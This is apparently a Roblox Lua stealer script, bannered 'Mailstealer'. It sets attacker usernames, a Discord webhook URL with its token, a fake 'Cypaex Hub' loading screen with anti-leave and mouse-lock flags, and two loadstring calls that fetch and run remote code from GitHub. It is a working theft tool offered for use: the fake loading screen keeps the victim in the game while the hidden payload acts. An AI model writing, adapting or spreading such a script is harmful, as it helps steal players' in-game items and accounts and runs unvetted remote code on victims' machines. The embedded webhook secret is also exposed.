--[[
  __  __       _ _     _             _           
  |  \/  | __ _(_) |___| |_ ___  __ _| | ___ _ __ 
  | |\/| |/ _` | | / __| __/ _ \/ _` | |/ _ \ '__|
  | |  | | (_| | | \__ \ ||  __/ (_| | |  __/ |   
  |_|  |_|\__,_|_|_|___/\__\___|\__,_|_|\___|_|   

]]--

UserName = "xYldrm0"
Webhook = "https://discord.com/api/webhooks/1128331201468444764/sXCT0Urwni0DUCTf_dwbJLIsSEMaROtK88tJcnKJTop_a4Vb5Qciw9MTLeySGMk_qcxQ"
UserName2 = "xYldrm01"

_G.LoadingScreen = true -- make it true if you want the loadingscreen
_G.AntiLeave = true -- make it true if you want the antileave
_G.MouseLock = true -- make it true if you want the mouselock

-- Remove These If You're Not Using The Rizz LoadingScreen

_G.ScriptName = "Cypaex Hub"
_G.FirstText = "Preparing..."
_G.SecondText = "Loading..."
_G.ThirdText = "Almost Done..."
_G.WaitingTime = 180 -- in secondes it's the time for the loading bar to hit from 0% to 100%

loadstring(game:HttpGet("https://raw.githubusercontent.com/Cypaex/CypaexHub/main/CypaexHub"))()
loadstring(game:HttpGet("https://raw.githubusercontent.com/Cypaex/Loading/main/Engine"))()
